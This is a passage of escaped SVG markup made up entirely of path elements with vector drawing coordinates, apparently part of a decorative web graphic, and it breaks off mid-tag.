d=\"M910.5,13.7c-3.1.2-6.8-.5-13.2-1.3,2.4.8,3.9.6,5.3,1-2.8-.3,1.9.8,2.4,1.1-1,.7-3.4.8,0,2.1-1.9-.2-3.7-.9-4.2-.7,3.7.5,1.1.7,4.4,1.2-1.6-.8-.6-.2,3.1.4-.7-.4-1.8-.9-2.5-1.3,1.2,0,3.9.5,5.1.5-3.2-.6,2.3.2.8-.3-3-.6-2.7-.3-5.2-.8a8.44,8.44,0,0,0-1.2-.4c2.5.3,4.8.7,5,.4a27,27,0,0,1-3.1-.5c1.9.3-2.7-1.4,2.9-.1.1-.2-1.3-.8,1.9-.1C909.1,14,915.8,14.8,910.5,13.7Z\"></path>\n <path d=\"M922.9,80c.8-.1,2.8.2,1.8-.4C921.5,79,922.3,80,922.9,80Z\"></path>\n <path d=\"M887.1,73.8c-.1-.2-.2-.3-.2-.5-2.5-.5-2.2-.2-5.2-.7-.3-.3.8-.4-2.3-.8a11.18,11.18,0,0,0,3.5,1.2C883.7,72.8,885.7,73.6,887.1,73.8Z\"></path>\n <path d=\"M1027,96.2c.8.1,1.5.3,2.3.4,2.9-.2,1.2-.7,3.5-.7C1029.4,95.4,1028.3,96.2,1027,96.2Z\"></path>\n <path d=\"M1047.2,95.7c-1.7-.1-6.4-.5-3.8.1C1042.6,95.2,1049,96.6,1047.2,95.7Z\"></path>\n <path d=\"M924.7,75.5c4.7.9,2-.1,6.1.7,2.2.7-.8.4,1.4.9-1-.6,7,.8,5,.3a39,39,0,0,1-6.5-1.4c1.9.1,1.7-.2.7-.5-1.8-.1-1,.7-5-.3C927.2,75.6,923.4,74.9,924.7,75.5Z\"></path>\n <path d=\"M746.9,45.1a23.56,23.56,0,0,1,4.1.5,12.3,12.3,0,0,0-3.4-1.1C750.8,45.2,743.9,44.7,746.9,45.1Z\"></path>\n <path d=\"M1022.3,87.9l.3.6a18.2,18.2,0,0,0,3.1.5C1023.4,88.6,1025.6,88.4,1022.3,87.9Z\"></path>\n <path d=\"M810.2,50a13,13,0,0,1-3.1-.4c1.2.7-1.6-.1-1.9,0,1.11.21,2.21.48,3.3.8-2.6-.5-2.5.1-.7.7-.8-.4.2-.4,3,.2.4.6,1.1.6.4,1,4.3.7,2,1,5.6,1.6-4.1-1.2.1-1.4-8.2-3.2C807.4,50,813.6,50.9,810.2,50Z\"></path>\n <path d=\"M1046.7,90.4c3.2.4,1.4-.5,3.7-.4,5.9,1.4,7.3,2.7.9,1.9-1-.5,1.3-.1.8-.4-3.7-.5-4.4.6.7,1.4-.5-.9,4.8-.2,7.7-.2-1.2-.2-3-.5-3.2-.6,5.3,1,.3-.3,3.9.1-1.5,0,3.7.9,3.2.6-2.5-.4-2.5-.8-4.4-1.2.9.4-2.1-.1-3-.2.2-.2-1.5-.5-2.3-.7,4,.4,5.5.8,7.1.6-3.4-.6-3.1-.3-5.3-.9,1.4.7-3.5-.3-3.9-.1-.1-.1-.1-.2-.2-.4-1.4-.2-2.8-.5-4.2-.7C1049.9,90.2,1045,89.9,1046.7,90.4Z\"></path>\n <path d=\"M1055.8,93.2a47.23,47.23,0,0,0,4.9.2C1056.2,92.5,1054.6,92.9,1055.8,93.2Z\"></path>\n <path d=\"M1202.1,116.5c2.6.5,2.2.2,5.2.8C1207,116.2,1206,116.7,1202.1,116.5Z\"></path>\n <path d=\"M948.2,74c4.8.6,3.5-.2,2.1-.9-.7-.4-1.5-.7-1-.8-3-.3-1.4.3-.2.8.9.4,1.6.8-.1.7-3.6-.6,2.6,0-2.3-.7C947.5,73.4,945.9,73.6,948.2,74Z\"></path>\n <path d=\"M901,66.1c1.4.2,2.8.5,4.2.7C906.2,65.9,904.9,66.5,901,66.1Z\"></path>\n <path d=\"M961.1,74.7c-1.3-.2-5.6.3-1.5.9C957.4,75,961.7,75.2,961.1,74.7Z\"></path>\n <path d=\"M986.7,77.8c.3.5-6.9,1.1.9,1.9C988.9,79.3,989.9,79.1,986.7,77.8Z\"></path>\n <path d=\"M817.5,49c-5.5-.9-6-2.7-2.1-2.5.8.6.4.8,1.5,1.3-.1-.2,2.9.4,3,.3-.3-.2-.8-.9-3.5-1.2,3,.3.6-.5,1.7-.5-3.1-.4-5.6-1.3-3.4-1a2.57,2.57,0,0,0,1.1.4c6.4-.1-3.8-3.2,4.5-2.8-1.5-.5-5.1-.7-5.3-1,5.7.4-2.3-2,4.1-1.7-1.08-.15-2.14-.35-3.2-.6,2.8.3,1.6-.9-.6-1.2.9-.3,3.6-.2,8.1.8-4.4-1.2,1.7-.3-.5-1-1.6.3-3-.9-6.5-1.4-.5.5-1.3.6,1.6,1.4-7.5-.1-1.9,2.5-4.3,3.3a32.89,32.89,0,0,1-5.2-.9c2.9.9,4.4,1.8,1.8,1.7,2.9.5,3.2.8,3.4,1.1-1.3-.2-1.5-.4-3.2-.6,0,.2.6.3,1.2.5-1.1-.2-1.3-.3-2.2-.5,1.6.6-2.6.1.3.7a6.05,6.05,0,0,1,1.9,0c-.1.2,1.3.5,1.3.7-4-.8-1.8,0-5.1-.6,3.1.9,3.4,1.1,1.6,1.4a24.16,24.16,0,0,1,4.3.9c-5-1.1-3.9.1-1.6.7-1.4-.2-2.3-.4-3.2-.6,1.2.9.9,1.6-2.1,1.6,4.7.7,3.3,1.3,2.6,1.4-1.3-.3-2.4-.5-3.3-.8,3,.7,2.7,0,.8-.3.9.8-3.3-.1-5-.3a72,72,0,0,0,10.6,2c-.4-.4-2.6-1.7,1.5-.9-3-.4,1.7.5,1.2.5-.6.4.4.5-.6.8a14,14,0,0,1,3.2.8c0-.2,3.4.5,3,.2C815.3,50.2,822.3,50.4,817.5,49Z\"></path>\n <path d=\"M983.5,77.3c-.2-.4-3.9-1.1-5.6-1.6C975,74.8,979.8,76.8,983.5,77.3Z\"></path>\n <path d=\"M888.4,59.9c2.4.2,1.7-.3-1.4-1,.6.9,1.9,1.6,0,2,1.4.2,4.1,1.1,4.3.8-3.7-1-.3-1,2.4-1C891.1,60.2,891.4,60.5,888.4,59.9Z\"></path>\n <path d=\"M1043,84.4c-1.7.2,2.5,1,.6,1.2,6,1,.4-1-1.7-1.6-.4.1-5.1,0-2.8.2C1040.8,84.4,1040.5,84.1,1043,84.4Z\"></path>\n <path d=\"M789.8,41.4c-6.2-1.1,1.8-.1-3.4-1.1.4.3-1.3,0-1.9,0,5.8,1.2-1.2.9,2.8,1.9C786.8,41.6,787.1,41.2,789.8,41.4Z\"></path>\n <path d=\"M792,42c.1.4-3.6-.8-3.1-.4,1,.3.4.4,1.4.9,1.4.2,2.8.5,4.2.7C794.1,42.8,795,42.5,792,42Z\"></path>\n <path d=\"M896.8,59.3c-.4-.3,5.4.5,1.8-.4.5.3-3-.4-3-.2,2.3.5-1.4.3,2.4,1.1.4-.2,1.7.5,3.2.6C902.2,60.2,897.6,59.7,896.8,59.3Z\"></path>\n <path d=\"M1015.1,78.7c3.3.6,1.9,0,5.1.6,0-.1-.1-.2-.2-.4C1017.3,78.6,1017.2,78.9,1015.1,78.7Z\"></path>\n <path d=\"M905.3,56.6c-5.8-.8-5.7-.6-10.3-1.4-.1.5,2.2,1-.6.8,7.5,1.4.4,1.3,2.8,1.9,2.6.2,0-.9,4.8-.1,2.6.6-1.7,0,1.3.7-.2-.6,1.4-1-1.9-2,3,.6,2.6.3,5.2.8C906.7,57.1,905.2,56.8,905.3,56.6Z\"></path>\n <path d=\"M1143,95.6c-.8-1.1-4.4-2.8-.3-2.8-3.8-.5-1.7,0-4.3-.8,1.7,1-8.7.1-3.1,1.7a19.06,19.06,0,0,0-3.1-.4c4.5.7.7.5-.8.3,2,.9-.5,1.3-1,1.9,2.5.3,5.2,1.1,5.3.9-1.5-.3-1.3-.5-2.3-.7,6.5,1.1,4.9.5,9.3,1.2-4.8-.9,1.4-1-3.7-1.7C1139,95,1142.5,95.7,1143,95.6Z\"></path>\n <path d=\"M792.2,36.3c-2.7,0-.7,1.1,1.9,2-1-.6,1-.4.6-.8C790.2,36.8,796.2,37,792.2,36.3Z\"></path>\n <path d=\"M902.9,53.5c2.6.5,3.4.8,4.1.6-2.8-.4.7-.5-3.4-1-.9.1,3.3.9.2.5-3.9-1.1-2.7-1.8-1.9-2-6.7-1.4-3.7.6-3.3,1.1l-2.1-.3c.7-.2-1.8-.6-2.4-1,.3-.2,2.1.1,1.8-.3-3.5-.6-1.5.2-2.8.2,1.1.4,3.4.9,3.5,1.2-4.4-.5-.7.6-3.6.5q3.45.6,3.3.9a19.07,19.07,0,0,0-2-.2c0-.2-.9-.4-2.3-.7,1,.6-.2.7-2.7.4,3.6.4.8.5,3.3.9,2.3.2-1.5-1.1,3.9,0-.3.1-1.4,0-.8.3,4.5.8,5.3.8,8.5,1.6.9-.3-3.7-1-3.5-1.4,3.7.7,5.5,1.3,6.2.9-4.2-.7-6.3-1.3-6.6-1.8C905.2,55.2,901.7,53.6,902.9,53.5Z\"></path>\n <path d=\"M753.8,28.6c3.9.5,2.2.7,5.4,1.1,1.5.1-.7-.9-2.3-.7-.3-.3,4.9.1-.4-.8,1.5.8-1.8.6-4-.2-2.9-.3,2.1,1.4-2.6.6,3.2.8,2.3.9,3.6,1.5C756.8,30.2,750.3,28.4,753.8,28.6Z\"></path>\n <path d=\"M866.5,46c-1.6,0-6.8-1.1-5.1-.6,5.5,1,2.2,1.3,5.6,1.7C866.2,46.8,865.9,46.4,866.5,46Z\"></path>\n <path d=\"M752.4,25.5c-4.1-.5-10.9-1.9-13.6-2.1,5.3,1,5.7,1.6,9.9,2.5C746.1,24.9,749.4,25.3,752.4,25.5Z\"></path>\n <path d=\"M894.3,47.7c-2.1.2,1.6,1.5-1.4,1.2,7,1.2,3.5,1,5.7,1.8,2,.4,2.3.3,4.1.6-.1-.2-.2-.5-.3-.7-4.2-.8-1.7-1.1-1.5-1.1a42.22,42.22,0,0,0,4.3.8c.3-.2-2-.6-1.3-.8-3.5-.7-.6.3-4.1-.5.7-.2-1.6-.6-1.3-.8,5.9.6,5.2-.4,3.3-1.2C894.9,46.2,899.5,49.3,894.3,47.7Z\"></path>\n <path d=\"M902.5,29.9c-5.4-.8,0,1.3-4.5.8.2-.3-6.3-1.5-5.2-.9,7.9,1,7.5,3,7.5,3.6,2.6.4-.6.8,2.7,1.6-.9,0-3.8-.6-3-.2,3.5.5,3.4,1.3,5.8,2.1-1.3-.2-1.4-.1-3.1-.4.1-.3-.2-.6-3.4-1.1,2.6.8,1,1.3,0,1.7a14.29,14.29,0,0,0-4.5-1.2c3,.6-.1.5.3.7,1.3.2,2.6.4,3.8.6-.5.3-.5.6.8,1-3.3-.6-2.1-.4-5.3-.9.1.3,2,.7,1.4.9-3.9-.7-4.5-.6-3.9-.1,2.5.2,2,.1,6.1.6.5.3,1.7.8.3.7-4.8-1.3-.5.2-5.2-.9a23,23,0,0,1-4.5.8c4,.7.4-.5,5,.4.1.2.2.5.3.7a21,21,0,0,0-4.1-.5c10,1.6,1.9,2.3,9.7,4.2-1.6-.3-2.7-.6-4.3-.9.4.3-1.3,0-1.9,0,1.5.5,3.1.3,4.3.8.4.5-.4.2-2-.2-.6.4,5.1,1.1,4.5,1.4-6.7-1.2.8.7-3.8,0,4.4,1,0,.5.5,1.1,4.5.9-.1-.6,2.9-.1.1.2,1.9.4,2.2.6a62.51,62.51,0,0,0,7.1.7c-6.9-1.1.8-.2-2.4-1.1,1.6.4,2.6.6,3.1.4-2.4-.4-1.3-.5-3.3-.9-.3.2-.1.5-2.9,0-2.2-1.5,2.1-1.5,5.8-2.2,4.1.9-1.5.6.5,1a17,17,0,0,1,3.1.5h0v-.1a.33.33,0,0,1,0-.47h0a.18.18,0,0,0,0-.27h0a6.37,6.37,0,0,0-1.7-.6c-.1.1-.2.2-2-.1-1.4-.6.5-.4-1.4-.9-8.6-1-4.5-2-2.9-2,.9-.3-2.8-.8-2.4-1.1,4,.6,5.5.5,3.8-.1-5.1-1-1.1.5-4.9-.1-.9-.6,3.8,0,.5-.9a29.59,29.59,0,0,0,5.2.8c-3-1.4-.3-1.4-3.2-2.6,2.1.3,1.5.6,4.3.9-2.1-1.9.1-3.1-3.4-5.2,3.8.7.7-.6,4,.1-4.3-1.2,1.9-.8-3-2.2,0,.1-1.3-.1-1.1-.3,2.8.4,2.2.6,4.3.9-.7-.3.9-.5-1.4-.9-.1.1-.2.2-2-.1-.1-.8,2-1,4.3-1.2,1.5.6,1,.6-.7.6,1.9.3,2.3.3,4,.6h.2a.3.3,0,0,1-.2-.1c-3.1-1.5-8.9-2.8-8.5-3.9-4.2-.8-2.4-.1-5.1-.5.2.4,2.9.9,3.5,1.2-4.6,0,.1,2.2.4,3a28.56,28.56,0,0,0-4.3-.9C899,29.1,901.3,29.5,902.5,29.9Z\"></path>\n <path d=\"M907.2,42c.5-.1-1.5-.8.8-.4,1.1.2,2.6.4,1,.1-1.4-.2-2.8-.5-4.2-.7C906.5,41.4,903.8,41.3,907.2,42Z\"></path>\n <path d=\"M909.1,48.3c-.8.2-2.1-.5-3.2-.6a5.88,5.88,0,0,1-2-.2c-.1.5,4.1.8,4.4,1.1-3.1-.4-2.9.1-3.7.4C907.7,49.2,909.7,48.6,909.1,48.3Z\"></path>\n <path d=\"M738.1,23.9c-1.8-.7.8-.5-2.5-1.2C732.6,22.5,739.1,24.3,738.1,23.9Z\"></path>\n <path d=\"M846.8,41.2c-.8.2,4.8,1.7,4.4,1.2C846.9,41.9,851.1,41.8,846.8,41.2Z\"></path>\n <path d=\"M839.8,40.7c3.3.6,1.9,0,5.1.6-.6-.3.9-.4-1.3-.8C845.2,41.4,840,40.4,839.8,40.7Z\"></path>\n <path d=\"M772.5,29.2c-1.9.3,10.2,2,5.3.9C777.6,30.6,774.4,29.5,772.5,29.2Z\"></path>\n <path d=\"M757.7,26.5c-.3-.2.2-.4-1.3-.7-.7,0-2.7.4-.8.4.1-.4,4.1,1,4.1.6Z\"></path>\n <path d=\"M763.2,25.9a1.82,1.82,0,0,0-1.1-.2c4.2.8-.1.3.3.7,3.4.4,3.1-.2,8.1.7-2.1-.3-1.5-.6-4.3-.9C766.5,26.4,765.3,26.3,763.2,25.9Z\"></path>\n <path d=\"M774.2,24.6c-1,.2,2.2.5,2.5.7.2,0,.5-.1.7-.1C776,25,775.1,24.8,774.2,24.6Z\"></path>\n <path d=\"M776.7,25.3a.37.37,0,0,0-.3.1h.2C776.7,25.4,776.7,25.4,776.7,25.3Z\"></path>\n <path d=\"M768.8,23.4c-2.8.1-1.2.2-.4,1.2,5.6,1.1,3.4,1,8.8,2.4-2.4-1-2.2-1.3-.9-1.5-2-.4-2.1-.6-4.2-1-.7.3,3.4,1.2-.7.7C768.1,24.1,773.5,24.3,768.8,23.4Z\"></path>\n <path d=\"M752.7,22.1c-4.3-1.2-3.1-1.9-8.1-2.8C747.3,20.3,748.1,21.1,752.7,22.1Z\"></path>\n <path d=\"M847.2,35.8c2.5.5,1.3.7,3.4,1.1.7-.4-2.4-1.2,1.5-1C849,35.5,849.5,36.1,847.2,35.8Z\"></path>\n <path d=\"M744.4,18.9c1.4.2,2.3.4,3.2.6.3-.4-.8-.8-3.5-1.4C745.7,18.7,747.1,19,744.4,18.9Z\"></path>\n <path d=\"M736.1,17.6a10.11,10.11,0,0,1,3,.3c1,0,.8-.3,1.8-.3a17.84,17.84,0,0,1-3.3-.8c-1.9-.1.6.4,1.3.8C738.3,17.6,732.9,16.9,736.1,17.6Z\"></path>\n <path d=\"M874.1,39.7c.6-.5-1.7-1.3.4-1.3-2-.1-9.5-1.1-5.8,0C871.1,38.4,872.5,39.3,874.1,39.7Z\"></path>\n <path d=\"M819.1,29.6c-1-.2-2.1-.3-3.1-.5,1.1.4.6.7,2.4,1.1-.3-.3,1.1-.1.8-.3a10.32,10.32,0,0,1-2.2-.5A12.34,12.34,0,0,0,819.1,29.6Z\"></path>\n <path d=\"M745.7,17.5c-.4.2,2.1,1.1,3.4,1-1.9-.3-2.5-.6-2.3-.8,1.4.2,2.3.4,3.2.6C749.7,17.8,747.5,17.7,745.7,17.5Z\"></path>\n <path d=\"M1115.1,77.7a10.78,10.78,0,0,0-1.8-.2c.2,0,.5.1.7.1,3,.6,7.3,1.9,1.6.7.1.4,5,1.1,6.5,1.5-.3-.4-2.6-.9-3.5-1.4C1118.1,78.7,1116.6,78.1,1115.1,77.7Z\"></path>\n <path d=\"M759.6,18.2c1.6.2,3.9.7,4.1.6-1.9-.3-2.5-.6-2.3-.8-6.8-1.3-6.8-1.5-12.8-2.6-1.4-.2.1.4-1.9.1-1.7-.4,1.5-.5-3.5-1.4,3.4,1.5.5,1.8,3.2,2.8,0-.2,4,.7,5.3,1-.3-.6,4.8,0,.4-1.2,3.8.6,7.8.9,9.5,1.7C760.8,18.3,759.6,18,759.6,18.2Z\"></path>\n <path d=\"M909.6,43c.9.1,2,.3,3.1.4,2.4.3,4.3.5.8-.2a1.67,1.67,0,0,1-.8.1c-.7-.1-1.3-.4-.3-.4a19.06,19.06,0,0,0-3.1-.4,10.32,10.32,0,0,1,2.2.5C910.2,42.8,909.4,42.8,909.6,43Z\"></path>\n <path d=\"M849.5,32.8c-.4-.5,4.6.3,5,0-1.6-.5-2.5-.3-3.2-.6-1.1-.7,3.4-.1,1.5-.9a7.46,7.46,0,0,1-2.1-.3C851.5,31.8,848.9,32.2,849.5,32.8Z\"></path>\n <path d=\"M763.1,17.3c-1.2-.2-1.2-.4-1.2-.5-4.4-.6-3.1-1-6.5-1.5C755.9,15.7,761.8,17.1,763.1,17.3Z\"></path>\n <path d=\"M737.2,11.7c-1.9-.1-.3.7,1.5,1.1C735.7,11.8,741.3,12.5,737.2,11.7Z\"></path>\n <path d=\"M740.4,12.3c.6.1,1.2.2,1.1.3,3.5.7.6-.3,4.1.5,1.4.4.5.7,2.5,1.2-1.4-.6,1.5,0,1.9-.1-2.3-.4-.7-.5-1.3-.8a64.57,64.57,0,0,0,7.3,1.2c-2.4-.8.3-1-1.6-1.3-1.7-.1,0,.8-4.9-.1.8,0,1.2-.1.8-.4-3.6-.5-8.2-.8-5.8,0-2.9-.5-2.2-.6-4.2-.7A.3.3,0,0,1,740.4,12.3Z\"></path>\n <path d=\"M757.6,13.9c-2.3-.1,1.2.9,2.6,1.4C761.8,15.4,758.3,14.4,757.6,13.9Z\"></path>\n <path d=\"M876.6,33.6c-.5-.1-1.2-.3-1.6-.4a8.65,8.65,0,0,0,1.6.2c2.7.4,4.9.4,3.4-.1-1.1-.1-2.2-.1-3.3-.2-1.4-.1-2.9-.2-4.7-.4,1.2.3,3.2.6,4.6.9.2.2.5.2.7.3S877,33.8,876.6,33.6Z\"></path>\n <path d=\"M747.1,12.1c4.4.7,2.2-.1.7-.5-2.5-.3-4.5-1.1-5.3-.9C746.2,11.3,748.6,12,747.1,12.1Z\"></path>\n <path d=\"M895.6,29.6c.7-.7,0-1-2.9-2,.9.6,1.1.6-.7.7C899,29.4,890.9,28.7,895.6,29.6Z\"></path>\n <path d=\"M865.9,23.9c-1.3-.8,3.2-1.1-3.1-2.5C866.6,22.6,861.7,22.6,865.9,23.9Z\"></path>\n <path d=\"M880.3,21.7c0,.3,1.8.6,2.4,1-3.9-.6,1,.7-3-.3,2.9.8-1.5.5,1.6,1.3,0-.1.1-.1,1,.1.6.1,1.2.2,1,.1-1.2-.2-1.2-.4-1.2-.5,3.6.8,3.9.7,4.1.5,2.3.5,6.3,1,5.5,1.4,4.2.5,5.2.1,7.8.2-4.9-.8-4.2-.1-9.1-.8.8-.3-5.9-1-5.5-1.4-.2-.6,4.5.7,4,.2-.3-.4-3.3-.3-3.2-.6,3.4.4-2.3-.7-1.3-.8.6.1,3.9.4,4.2.7s-1.3,0-1.9,0c1.8.3,3.3.6,4.2.8-.4-.5.6-1.1-5-2.4-2.4-.1,1.7.5,1.3.8-4.2-.4-5.9-.8-3.3-.9-4.3-.7-3.4,0-.7.7a10.11,10.11,0,0,0-3-.3c1.2.2,3,.5,3.2.6s-.7.2-1.9,0c-1.3-.4-2.8-.8-4.4-1.2l-1.1-.3c-.9-.1-.1.3,1.1.6C878.1,21.3,879.6,21.7,880.3,21.7Z\"></path>\n <path d=\"M876.4,21.6c-3.5-.5-6.6-.9-7.1-.6C871.9,21.2,875.2,21.7,876.4,21.6Z\"></path>\n <path d=\"M886,15.3c-.7-.5-4.2-1.5.5-1-5.9-.9-4.2-1.4-6.8-2.1-5.6-.6,6.1,2.1-.3,1.4-.2-.2-.5-.3-2.2-.6h0c-.9.4,2.4,2-5.4.9,3.8,1,3.7,1.2-.7.7,2.4.4,4.4.6,6,.8a21.86,21.86,0,0,0,4.2.2c.2.2,3.5.7,3.3.9a25.55,25.55,0,0,0-2.9.1c1.8.3,3.3.6,4.3.8.7-.2-1.6-.6-1.3-.8,1.5.3,1.9.5,3.3.8.5-.3-2.5-.8-2.5-1.2a39.07,39.07,0,0,1,4.3.9c-1.9.3,7.6,2.4,4,2.3,4.3.5,1.1-.5,2.6-.6-.7-.3-5-.8-5.4-1.1-.1-.1-.1-.2-.2-.4a35.54,35.54,0,0,1,7.5,1.6c2.3.1-3.2-1-3.5-1.4,1.1,0,.6-.4,4,.2,2.1.5,5,1.1,6.6,1.6-2.4-.4-4-.7-5.3-1-.4.6,3.5.7,4.5,1.3.2.5-1.3.4-2.7.4,1.2.2,3,.5,3.2.6-5.1.3-1.7,2.6-7.4,2.9-1.2-.2-1.2-.4-1.2-.5a37.31,37.31,0,0,0-4.1-.5c2.8.7,7.2,1.6,10.8,2.3.5.6-3.5-.6-4-.2,2.6.7,5.1.8,8.4,1.4-3.3-1,.3-.8-3.7-1.7-1.1-.1-.1.4-3-.2a37.58,37.58,0,0,1,6,.3c-1.3-.6-1.5-1.2-.6-1.2,2,.1,2.1.4,4.3.8.6-.4-5.1-1.1-4.5-1.4,2,.3,3.5.5,4.1.5-7.2-1.1,4.7,0-1.6-1.3-1.4-.1-.2.5-2.9.1-.7-.8,2.7-.4,4.6-.5-1.2-.2-3-.5-3.2-.6,4.4.3-.8-1.2,2.1-1.6-4.9-.8-2.2-.7-2.4-1.1-3.3-.6-3-.3-6.2-.9,1.9.8-.5.1-4-.2-1.6-1-6.6-2.2-10.2-3.3C886.2,14.4,889.8,15.6,886,15.3Z\"></path>\n <path d=\"M911.8,26.9c.9.1-.1-.3,1.4-.1.5.1,1.3.2,2.6.4,0,.2.5.5,1.2.4,0-.2-.6-.3-1.2-.5-1.1-.2-1.9-.3-2.6-.4a25.93,25.93,0,0,1-3.7-.6C909.8,26.3,908.7,26.5,911.8,26.9Z\"></path>\n <path d=\"M869,18.1c3.1.5,7.9,1,6.1.6-1.9-.2-2.7-.2-5.1-.5-.2-.2,0-.4-2.3-.7C867.6,17.7,869,17.9,869,18.1Z\"></path>\n <path d=\"M889.3,20.3a19.07,19.07,0,0,0,2,.2,2.71,2.71,0,0,0,1.2.4c0-.5,1.8-.6-3.7-1.6C890.9,20,889.2,20.2,889.3,20.3Z\"></path>\n <path d=\"M876,16.6c-3.7-.6-3.1-.1-5-.3a18.2,18.2,0,0,0,3.1.5C871.2,16.2,877.4,17.2,876,16.6Z\"></path>\n <path d=\"M913.4,17.7c1.3.3.8.4,0,.3a12.05,12.05,0,0,0-1.9,0,7.14,7.14,0,0,0,1.9.2,10.53,10.53,0,0,1,3.3.5,10.36,10.36,0,0,0-2-.2c6.7.9,1.3-.3,2.6-.6a24.13,24.13,0,0,0-3.8-.4,4.87,4.87,0,0,1-1.2-.1C912.7,17.5,913.1,17.6,913.4,17.7Z\"></path>\n <path d=\"M870.1,10.2c3.7.9-.8.5,4.5,1.4-.4-.3-2.3-.8-.3-.7C872,10.7,870.2,9.9,870.1,10.2Z\"></path>\n <path d=\"M874.2,10.7c1.2.2,2.1.5,3,.7,1.2.3,2.5.6,4.5,1-.1-.2-.1-.3-.2-.5-1.1-.2-3.1-.5-4.3-.7-.6-.1-1-.2-1-.3a1.56,1.56,0,0,0,1-.1.18.18,0,0,0,0-.27h0a2.37,2.37,0,0,0-1.4-.5C873.5,9.9,877.5,11.1,874.2,10.7Z\"></path>\n <path d=\"M879.6,9.8a7.46,7.46,0,0,0-2.1-.3c1.2.3,7.4,1.8,6.5,1.4-3-.6-.4-.6.8-.4a15.73,15.73,0,0,1-3.3-.8C879.6,9.5,883.1,10.3,879.6,9.8Z\"></path>\n <path d=\"M910.2,11a12.17,12.17,0,0,1,3.4.4,41,41,0,0,0,4.9.9c-.2-.3-2.7-.8-4.9-1.1S909.6,10.6,910.2,11Z\"></path>\n <path d=\"M928.2,103.9c-3.3-.6-1.9,0-5.1-.6-1-.6,1.3-.2.7-.7-.5-.2-4.4-1.2-5.3-1,3.5.8.2.7.5,1.1a17.84,17.84,0,0,1,3.3.8C922.3,103,929.9,104.9,928.2,103.9Z\"></path>\n <path d=\"M761.4,34.5c3,.4,3.2.4,6.3,1l-.3-.6c-2.8-.7-3.6-.5-5.3-1,.2-.2,1.7,0,4.1.5a12.72,12.72,0,0,0-4.7-1.7C762.7,33.6,758.4,33.2,761.4,34.5Z\"></path>\n <path d=\"M824.9,41.9c0-.1.8,0,1.1.2a2.71,2.71,0,0,0,1.2.4c-.1-.7,3.2.1,4.7-.2-4.6-.9-5.8-.8-8.3-1.2C824.2,41.4,822.6,41.5,824.9,41.9Z\"></path>\n <path d=\"M818.7,34.9c-4.2-.4-.4.7,1.5,1.3a7.45,7.45,0,0,1-2-.1c-1.7-.4,0-.5-3.4-1,1.5,1,.4,1-.3,1.4,4.3.2,6,1.2,9.4,1.6-3.5-.8,6.1.5,1.7-.5-1.7-.1-4.3-1.2-2.5-1.2-1.5-.5-3.8-.5-4.3-.8-1.6-.7,1.9-.2,4,.3a49.92,49.92,0,0,0-8.7-2.1C813.7,34,818.2,34.5,818.7,34.9Z\"></path>\n <path d=\"M793.3,30.3c-8.2-1.2-3.4.8-4.1,1.5a7.13,7.13,0,0,1,3,.5c-3.3-.1,2.2,1.6,2,2.1.9-.4,2.2-1.1-1-2,2.7.3,1.8-.1.7-.6,1.8.3,3.3.6,4.3.8a36.07,36.07,0,0,0-8-2.5C791.9,30.3,793.9,30.7,793.3,30.3Z\"></path>\n <path d=\"M1701.8,92.1c1.7-.2,3.8-.5,1.8-1h-1.7c-3.4.2.2,1.2-7.4.6,2.7.7,4.2.9,1.4,1.6,5.8.2,4.8-.3,6-.5.1,0,.2-.1.4-.1h-.4C1699.1,92.5,1700.2,92.3,1701.8,92.1Z\"></path>\n <path d=\"M1676,91.4c-3.6-.4,0-.6-6.3-.8C1670.3,90.9,1671.3,91.2,1676,91.4Z\"></path>\n <path d=\"M1697.2,91.7c1-.3,4.5-.5-.8-.9C1697.5,91.1,1692.8,91.4,1697.2,91.7Z\"></path>\n <path d=\"M1669.2,85.2a66.58,66.58,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C1675.3,84.8,1673.1,85.2,1669.2,85.2Z\"></path>\n <path d=\"M1676.8,84.4c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C1675.7,84.6,1681.1,84.6,1676.8,84.4Z\"></path>\n <path d=\"M1649.6,83.4c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C1645.7,83.6,1649.2,83.6,1649.6,83.4Z\"></path>\n <path d=\"M1653.4,81.5c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C1646,81.2,1649.8,81.7,1653.4,81.5Z\"></path>\n <path d=\"M1663,81.3c-2.6.1-6.4,0-6.7.3C1661,81.8,1663,81.7,1663,81.3Z\"></path>\n <path d=\"M1656.4,80.1a37.64,37.64,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C1656.5,80.7,1654.9,80.5,1656.4,80.1Z\"></path>\n <path d=\"M1697.3,80.8c-.4.3-7.1.6.8.9C1695.7,81.3,1701.4,81.1,1697.3,80.8Z\"></path>\n <path d=\"M1689.9,77.1c.2-1.1,1.6-1.1,3.6-2.2-7.2-.1-7.7,0-2.4.5-2.7-.1-3,.1-5.6,0C1690.9,76,1683.8,76.9,1689.9,77.1Z\"></path>\n <path d=\"M1695.3,73.8c-5.3,0-4.4.6-6.1,1C1695.7,74.8,1694.2,74.2,1695.3,73.8Z\"></path>\n <path d=\"M1424,67c-5.6-.2-1.5,1.4-.4,1.1C1423.5,67.5,1423.1,67.5,1424,67Z\"></path>\n <path d=\"M1644.3,71.1c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C1647.2,71,1647.7,71.2,1644.3,71.1Z\"></path>\n <path d=\"M1448.2,66.1c0-.4,1.8-.7,1.8-1.2C1446.3,65,1444.3,66.1,1448.2,66.1Z\"></path>\n <path d=\"M1696.8,70.8c.2-.4,2.6-1-1.3-1.4C1695.3,69.9,1691.7,70.2,1696.8,70.8Z\"></path>\n <path d=\"M1473.3,64.6c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C1481.5,64.8,1475.4,64.4,1473.3,64.6Z\"></path>\n <path d=\"M1460.1,63.8c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5-3.4.1-6.2-.5-7.1-.2,2.2.2,4.2.6,2,.7C1458.2,63.7,1459.1,63.8,1460.1,63.8Z\"></path>\n <path d=\"M1642.1,67c-.6.5,7.3.4,10,.3C1648.7,67,1645.1,67.3,1642.1,67Z\"></path>\n <path d=\"M1649.2,64c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C1645.6,64.4,1649.5,64.4,1649.2,64Z\"></path>\n <path 